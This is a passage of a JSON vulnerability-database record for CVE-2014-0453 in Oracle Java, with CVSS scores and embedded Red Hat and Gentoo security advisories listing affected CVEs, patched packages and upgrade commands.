"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0453" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle", "sources": [ { "db": "BID", "id": "66914" } ], "trust": 0.3 }, "cve": "CVE-2014-0453", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "impactScore": 4.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2014-0453", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "id": "VHN-67946", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-0453", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201404-268", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-67946", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-0453", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Security. \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027Security\u0027 sub-component. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. Affects the confidentiality and integrity of data. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.7.0-ibm security update\nAdvisory ID: RHSA-2014:0486-01\nProduct: Red Hat Enterprise Linux Supplementary\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0486.html\nIssue date: 2014-05-13\nCVE Names: CVE-2013-6629 CVE-2013-6954 CVE-2014-0429 \n CVE-2014-0446 CVE-2014-0448 CVE-2014-0449 \n CVE-2014-0451 CVE-2014-0452 CVE-2014-0453 \n CVE-2014-0454 CVE-2014-0455 CVE-2014-0457 \n CVE-2014-0458 CVE-2014-0459 CVE-2014-0460 \n CVE-2014-0461 CVE-2014-1876 CVE-2014-2398 \n CVE-2014-2401 CVE-2014-2402 CVE-2014-2409 \n CVE-2014-2412 CVE-2014-2414 CVE-2014-2420 \n CVE-2014-2421 CVE-2014-2423 CVE-2014-2427 \n CVE-2014-2428 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.0-ibm packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5 and 6 Supplementary. \n\nThe Red Hat Security Response Team has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64\nRed Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 5) - i386, ppc, s390x, x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64\n\n3. Description:\n\nIBM Java SE version 7 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit. \n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM Security alerts\npage, listed in the References section. (CVE-2014-0457, CVE-2014-2421,\nCVE-2014-0429, CVE-2014-0461, CVE-2014-0455, CVE-2014-2428, CVE-2014-0448,\nCVE-2014-0454, CVE-2014-0446, CVE-2014-0452, CVE-2014-0451, CVE-2014-2402,\nCVE-2014-2423, CVE-2014-2427, CVE-2014-0458, CVE-2014-2414, CVE-2014-2412,\nCVE-2014-2409, CVE-2014-0460, CVE-2013-6954, CVE-2013-6629, CVE-2014-2401,\nCVE-2014-0449, CVE-2014-0459, CVE-2014-0453, CVE-2014-2398, CVE-2014-1876,\nCVE-2014-2420)\n\nAll users of java-1.7.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 7 SR7 release. All running instances\nof IBM Java must be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1031734 - CVE-2013-6629 libjpeg: information leak (read of uninitialized memory)\n1045561 - CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette\n1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618)\n1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736)\n1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766)\n1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841)\n1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394)\n1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854)\n1087424 - CVE-2014-0455 OpenJDK: MethodHandle variable argument lists handling (Libraries, 8029844)\n1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794)\n1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010)\n1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797)\n1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152)\n1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030)\n1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188)\n1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801)\n1087438 - CVE-2014-2402 OpenJDK: Incorrect NIO channel separation (Libraries, 8026716)\n1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740)\n1087440 - CVE-2014-0454 OpenJDK: Prevent SIGNATURE_PRIMITIVE_SET from being modified (Security, 8029745)\n1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163)\n1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731)\n1087444 - CVE-2014-0459 lcms: insufficient ICC profile version validation (OpenJDK 2D, 8031335)\n1088024 - CVE-2014-0448 Oracle JDK: unspecified vulnerability fixed in 7u55 and 8u5 (Deployment)\n1088025 - CVE-2014-2428 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088027 - CVE-2014-2409 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088028 - CVE-2014-0449 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088030 - CVE-2014-2401 Oracle JDK: unspecified vulnerability fixed in 5.0u75, 6u75, 7u55 and 8u5 (2D)\n1088031 - CVE-2014-2420 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 5):\n\ni386:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 5):\n\ni386:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\n\nppc:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm\n\ns390x:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.s390.rpm\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.s390.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.s390.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.s390.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.s390.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 6):\n\ni386:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Supplementary (v. 6):\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 6):\n\ni386:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\n\nppc64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm\n\ns390x:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Supplementary (v. 6):\n\ni386:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-6629.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-6954.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0429.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0446.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0448.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0449.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0451.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0452.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0453.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0454.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0455.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0457.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0458.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0459.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0460.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0461.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-1876.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2398.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2401.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2402.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2409.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2412.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2414.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2420.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2421.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2423.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2427.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2428.html\nhttps://access.redhat.com/security/updates/classification/#critical\nhttps://www.ibm.com/developerworks/java/jdk/alerts/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTcndLXlSAg2UNWIIRAidtAKC2xzybC9AZogqPqbKlnVNtoXAK9gCghl3w\n7WuHx5m587mnR/PKDaPZlzw=\n=q8QV\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201502-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Oracle JRE/JDK: Multiple vulnerabilities\n Date: February 15, 2015\n Bugs: #507798, #508716, #517220, #525464\n ID: 201502-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Oracle\u0027s Java SE\nDevelopment Kit and Runtime Environment, the worst of which could lead\nto execution of arbitrary code. Please review the CVE\nidentifiers referenced below for details. \n\nImpact\n======\n\nA context-dependent attacker may be able to execute arbitrary code,\ndisclose, update, insert, or delete certain data. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jre-bin-1.7.0.71\"\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jdk-bin-1.7.0.71\"\n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge -a -1 -v \"\u003e=app-emulation/emul-linux-x86-java-1.7.0.71\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429\n[ 2 ] CVE-2014-0432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0432\n[ 3 ] CVE-2014-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446\n[ 4 ] CVE-2014-0448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0448\n[ 5 ] CVE-2014-0449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0449\n[ 6 ] CVE-2014-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451\n[ 7 ] CVE-2014-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452\n[ 8 ] CVE-2014-0453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453\n[ 9 ] CVE-2014-0454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0454\n[ 10 ] CVE-2014-0455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0455\n[ 11 ] CVE-2014-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456\n[ 12 ] CVE-2014-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457\n[ 13 ] CVE-2014-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458\n[ 14 ] CVE-2014-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459\n[ 15 ] CVE-2014-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460\n[ 16 ] CVE-2014-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461\n[ 17 ] CVE-2014-0463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0463\n[ 18 ] CVE-2014-0464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0464\n[ 19 ] CVE-2014-2397\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397\n[ 20 ] CVE-2014-2398\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398\n[ 21 ] CVE-2014-2401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2401\n[ 22 ] CVE-2014-2402\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2402\n[ 23 ] CVE-2014-2403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403\n[ 24 ] CVE-2014-2409\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2409\n[ 25 ] CVE-2014-2410\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2410\n[ 26 ] CVE-2014-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412\n[ 27 ] CVE-2014-2413\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2413\n[ 28 ] CVE-2014-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414\n[ 29 ] CVE-2014-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2420\n[ 30 ] CVE-2014-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421\n[ 31 ] CVE-2014-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2422\n[ 32 ] CVE-2014-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423\n[ 33 ] CVE-2014-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427\n[ 34 ] CVE-2014-2428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2428\n[ 35 ] CVE-2014-2483\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2483\n[ 36 ] CVE-2014-2490\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2490\n[ 37 ] CVE-2014-4208\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4208\n[ 38 ] CVE-2014-4209\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4209\n[ 39 ] CVE-2014-4216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4216\n[ 40 ] CVE-2014-4218\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4218\n[ 41 ] CVE-2014-4219\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4219\n[ 42 ] CVE-2014-4220\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4220\n[ 43 ] CVE-2014-4221\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4221\n[ 44 ] CVE-2014-4223\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4223\n[ 45 ] CVE-2014-4227\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4227\n[ 46 ] CVE-2014-4244\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4244\n[ 47 ] CVE-2014-4247\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4247\n[ 48 ] CVE-2014-4252\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4252\n[ 49 ] CVE-2014-4262\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4262\n[ 50 ] CVE-2014-4263\n 